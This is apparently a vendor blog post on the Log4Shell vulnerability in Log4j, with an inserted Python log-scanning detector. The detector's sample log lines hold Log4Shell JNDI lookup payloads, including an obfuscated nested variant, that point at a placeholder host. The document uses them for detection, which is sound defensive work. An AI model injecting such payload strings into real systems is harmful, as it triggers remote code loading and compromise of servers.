Log4Shell: The Most Dangerous Java Vulnerability for Years
On Dec. 9, 2021, a zero-day exploit (since dubbed "Log4Shell") was observed in the wild targeting a critical RCE vulnerability in Log4j, the ubiquitous open source logging library. (Per NIST, in affected versions the JNDI features used in configuration, log messages, and parameters do not protect against attacker-controlled LDAP and other JNDI-related endpoints.) Numerous platforms appear to be affected, including Apple, Cloudflare, and Twitter, in addition to the myriad popular Java ecosystem products that have Log4j integrated into their software supply chains, such as Logstash, Apache Kafka, Elasticsearch, and even Minecraft.
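Because the lookup string arrives inside attacker-supplied data that ends up in a log message, a first defensive step is to search the logs you already have for it. The following detection example is added here and is not code from the original post or from Bugcrowd: it scans constructed sample log lines for JNDI lookup strings, including the nested-lookup wrappers (case transforms and default values) that defeat a naive literal match; the host names in the samples are placeholders.

```python
import re

# Constructed sample log lines (not from the original post): the first two carry
# a JNDI lookup string of the kind the post describes, the rest are benign.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - "GET /login HTTP/1.1" 200 "${jndi:ldap://lookup.example/x}"',
    '10.0.0.6 - - "GET / HTTP/1.1" 200 '
    '"${${lower:j}${upper:n}di:rmi://lookup.example/x}"',
    '10.0.0.7 - - "GET / HTTP/1.1" 200 "Mozilla/5.0 (compatible; monitoring-bot)"',
    '10.0.0.8 - - "GET /docs?q=${env:HOME} HTTP/1.1" 404 "curl/7.79"',
]

# Log4j resolves nested lookups before the outer one, so a signature that only
# looks for the literal "${jndi:" misses wrapped forms. These two patterns
# unwrap the common case-transform and default-value wrappers.
_WRAPPERS = [
    (re.compile(r"\$\{(?:lower|upper):([^${}]*)\}", re.IGNORECASE),
     lambda m: m.group(1)),
    (re.compile(r"\$\{[^${}]*:-([^${}]*)\}"),
     lambda m: m.group(1)),
]
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def normalize(text: str) -> str:
    """Collapse nested lookup wrappers until the inner text stops changing."""
    previous = None
    while previous != text:
        previous = text
        for pattern, repl in _WRAPPERS:
            text = pattern.sub(repl, text)
    return text


def is_jndi_lookup(line: str) -> bool:
    """True if the line contains a JNDI lookup string, wrapped or not."""
    return _JNDI.search(normalize(line)) is not None


def scan(lines):
    """Return (line_number, normalized_line) for every suspicious log line."""
    return [(n, normalize(line))
            for n, line in enumerate(lines, 1) if is_jndi_lookup(line)]


if __name__ == "__main__":
    for n, line in scan(SAMPLE_LOG_LINES):
        print(f"line {n}: {line}")
```

A hit is a trigger for incident response and for confirming which Log4j version the logging host runs; it does not replace upgrading the library.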
Many experts believe that the Log4j vulnerability is the worst one in years, perhaps even more dangerous than the Apache Struts RCE vulnerability (CVE-2017-5638) of 2017 that contributed to the massive breach at Equifax. The latest vulnerability, according to Bugcrowd founder and CTO Casey Ellis, is a toxic combination of a huge attack surface, easy exploitability, a hard-to-avoid dependency, and extreme virality. It is also a reminder that software supply chains have become deeply complex, with interdependencies that are often beyond the reach of automated tools like scanners.
It will be a moment of clarity for organizations that have yet to implement a platform-powered continuous security testing approach. This approach blends data, technology and human intelligence to find and fix security vulnerabilities before they cause harm. We'll discuss the ways this approach has helped Bugcrowd confirm the context of its findings and communicate Log4Shell vulnerabilities to customers in a forthcoming blog.
We are here to assist you with the following:
1. For continuous crowd-powered detection of Log4Shell exposures around your perimeter for a period of 30 days, you can use the "Log4j on Fire" bug bounty solution. See details and get started here.
2. Another Day Another Cube: deeper insights into the risk profile of this vulnerability and its potential impact in this Security Flash video featuring Casey Ellis and Application Security Engineer Adam Foster.
3. Live Q&A session with Casey next week (Monday, December 20 at 10am PST) to answer your questions about how to protect yourself and implement best practices against the Log4j vulnerability and the Log4Shell exploit. Register now to reserve your seat.
4. Here's an overview of all our Log4j/Log4Shell resources.
We are extremely proud of our customers, researchers and team members who are working together tirelessly to make our connected world safer during this time of uncertainty. As always, we'll get through this together!